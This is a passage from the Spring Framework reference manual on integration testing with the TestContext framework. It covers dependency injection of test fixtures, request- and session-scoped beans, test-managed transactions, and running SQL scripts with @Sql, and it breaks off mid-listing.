perform <<core.adoc#beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit 4. The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit 4 based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring since the early years, and since Spring 3.2 it's a breeze to test your\nrequest-scoped and session-scoped beans by following these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<core.adoc#expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"\\#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<data-access.adoc#tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia the `@Commit` and `@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nSince Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured to commit the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in a test class or any `void` default method in a test interface with one of these\nannotations, and the `TransactionalTestExecutionListener` ensures that your __before\ntransaction method__ or __after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit Jupiter's `@BeforeEach`) and\nany __after methods__ (such as methods annotated with JUnit Jupiter's `@AfterEach`) are\nexecuted __within__ a transaction. In addition, methods annotated with\n`@BeforeTransaction` or `@AfterTransaction` are naturally not executed for test methods\nthat are not configured to run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit 4 based example displays a _fictitious_ integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of a Hibernate session or JPA\npersistence context, make sure to __flush__ the underlying unit of work within test\nmethods that execute that code. Failing to flush the underlying unit of work can produce\n__false positives__: your test may pass, but the same code throws an exception in a live,\nproduction environment. In the following Hibernate-based example test case, one method\ndemonstrates a false positive, and the other method correctly exposes the results of\nflushing the session. Note that this applies to any ORM frameworks that maintain an\nin-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tSessionFactory sessionFactory;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@PersistenceContext\n\tEntityManager entityManager;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<data-access.adoc#jdbc-embedded-database-support, Embedded database support>> and\n<<data-access.adoc#jdbc-embedded-database-dao-testing,\nTesting data access logic with an embedded database>> for details.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. `ResourceDatabasePopulator` provides options for configuring the\ncharacter encoding, statement separator, comment delimiters, and error handling flags\nused when parsing and executing the scripts, and each of the configuration options has\na reasonable default value. Consult the javadocs for details on default values. To\nexecute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either\nthe `populate(Connection)` method to execute the populator against a\n`java.sql.Connection` or the `execute(DataSource)` method to execute the populator\nagainst a `javax.sql.DataSource`. The following example specifies SQL scripts for a test\nschema and test data, sets the statement separator to `\"@@\"`, and then executes the\nscripts against a `DataSource`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\tpublic void databaseTest {\n\t\tResourceDatabasePopulator populator = new ResourceDatabasePopulator();\n\t\tpopulator.addScripts(\n\t\t\tnew ClassPathResource(\"test-schema.sql\"), \n\t\t\tnew ClassPathResource(\"test-data.sql\"));\n\t\tpopulator.setSeparator(\"@@\");\n\t\tpopulator.execute(this.dataSource);\n\t\t\/\/ execute code that uses the test schema and data\n\t}\n----\n\nNote that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing\nand executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in\n<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\ninternally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs\nfor the various `executeSqlScript(..)` methods for further details.\n\n\n[[testcontext-executing-sql-declaratively]]\n===== Executing SQL scripts declaratively with @Sql\n\nIn addition to the aforementioned mechanisms for executing SQL scripts\n_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring\nTestContext Framework. Specifically, the `@Sql` annotation can be declared on a test\nclass or test method to configure the resource paths to SQL scripts that should be\nexecuted against a given database either before or after an integration test method. Note\nthat method-level declarations override class-level declarations and that support for\n`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.\n\n*Path resource semantics*\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"schema.sql\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/schema.sql\"`. A path\nwhich references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)\nwill be loaded using the specified resource protocol.\n\nThe following example demonstrates how to use `@Sql` at the class level and at the method\nlevel within a JUnit Jupiter based integration test class.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@SpringJUnitConfig\n\t@Sql(\"\/test-schema.sql\")\n\tclass DatabaseTests {\n\n\t\t@Test\n\t\tvoid emptySchemaTest {\n\t\t\t\/\/ execute code that uses the test schema without any test data\n\t\t}\n\n\t\t@Test\n\t\t@Sql({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\t\tvoid userTest {\n\t\t\t\/\/ execute code that uses the test schema and test data\n\t\t}\n\t}\n----\n\n*Default script detection*\n\nIf no SQL scripts are specified, an attempt will be made to detect a `default` script\ndepending on where `@Sql` is declared. If a default cannot be detected, an\n`IllegalStateException` will be thrown.\n\n* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the\n\tcorresponding default script is `\"classpath:com\/example\/MyTest.sql\"`.\n* __method-level declaration__: if the annotated test method is named `testMethod()` and is\n\tdefined in the class `com.example.MyTest`, the corresponding default script is\n\t`\"classpath:com\/example\/MyTest.testMethod.sql\"`.\n\n*Declaring multiple `@Sql` sets*\n\nIf multiple sets of SQL scripts need to be configured for a given test class or test\nmethod but with different syntax configuration, different error handling rules, or\ndifferent execution phases per set, it is possible to declare multiple instances of\n`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the\n`@SqlGroup` annotation can be used as an explicit container for declaring multiple\ninstances of `@Sql`.\n\nThe following example demonstrates the use of `@Sql` as a repeatable annotation using\nJava 8. In this scenario the `test-schema.sql` script uses a different syntax for\nsingle-line comments.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\"))\n\t@Sql(\"\/test-user-data.sql\")\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\nThe following example is identical to the above except that the `@Sql` declarations are\ngrouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@SqlGroup({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n*Script execution phases*\n\nBy default, SQL scripts will be executed _before_ the corresponding test method. However,\nif a particular set of scripts needs to be executed _after_ the test method -- for\nexample, to clean up database state -- the `executionPhase` attribute in `@Sql` can be\nused as seen in the following example. Note that `ISOLATED` and `AFTER_TEST_METHOD` are\nstatically imported from `Sql.TransactionMode` and `Sql.ExecutionPhase` respectively.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"create-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED)\n\t)\n\t@Sql(\n\t\tscripts = \"delete-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED),\n\t\texecutionPhase = AFTER_TEST_METHOD\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that needs the test data to be committed\n\t\t\/\/ to the database outside of the test's transaction\n\t}\n----\n\n*Script configuration with `@SqlConfig`*\n\nConfiguration for script parsing and error handling can be configured via the\n`@SqlConfig` annotation. When declared as a class-level annotation on an integration test\nclass, `@SqlConfig` serves as _global_ configuration for all SQL scripts within the test\nclass hierarchy. When declared directly via the `config` attribute of the `@Sql`\nannotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared\nwithin the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit\ndefault value which is documented in the javadocs of the corresponding attribute. Due to\nthe rules defined for annotation attributes in the Java Language Specification, it is\nunfortunately not possible to assign a value of `null` to an annotation attribute. Thus,\nin order to support overrides of inherited global configuration, `@SqlConfig` attributes\nhave an explicit default value of either `\"\"` for Strings or `DEFAULT` for Enums. This\napproach allows local declarations of `@SqlConfig` to selectively override individual\nattributes from global declarations of `@SqlConfig` by providing a value other than `\"\"`\nor `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`\nattributes do not supply an explicit value other than `\"\"` or `DEFAULT`. Explicit _local_\nconfiguration therefore overrides _global_ configuration.\n\nThe configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those\nsupported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those\nprovided by the `<jdbc:initialize-database\/>` XML namespace element. Consult the javadocs\nof individual attributes in `@Sql` and `@SqlConfig` for details.\n\n[[testcontext-executing-sql-declaratively-tx]]\n*Transaction management for `@Sql`*\n\nBy default, the `SqlScriptsTestExecutionListener` will infer the desired transaction\nsemantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed\nwithout a transaction, within an existing Spring-managed transaction -- for example, a\ntransaction managed by the `TransactionalTestExecutionListener` for a test annotated with\n`@Transactional` -- or within an isolated transaction, depending on the configured value\nof the `transactionMode` attribute in `@SqlConfig` and the presence of a\n`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum\nhowever, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.\n\nIf the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and\n`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,\nyou may specify explicit names via the `dataSource` and `transactionManager` attributes\nof `@SqlConfig`. Furthermore, the transaction propagation behavior can be controlled via\nthe `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be\nexecuted in an isolated transaction. Although a thorough discussion of all supported\noptions for transaction management with `@Sql` is beyond the scope of this reference\nmanual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide\ndetailed information, and the following example demonstrates a typical testing scenario\nusing JUnit Jupiter and transactional tests with `@Sql`. Note that there is no need to\nclean up the database after the `usersTest()` method is executed since any changes made\nto the database (either within the test method or within the `\/test-data.sql` script)\nwill be automatically rolled back by the `TransactionalTestExecutionListener` (see\n<<testcontext-tx,transaction management>> for details).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@SpringJUnitConfig(TestDatabaseConfig.class)\n\t@Transactional\n\tclass TransactionalSqlScriptsTests {\n\n\t\tfinal JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tTransactionalSqlScriptsTests(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\t@Sql(\"\/test-data.sql\")\n\t\tvoid usersTest() {\n\t\t\t\/\/ verify state in test database:\n\t\t\tassertNumUsers(2);\n\t\t\t\/\/ execute code that uses the test data...\n\t\t}\n\n\t\tint countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tvoid 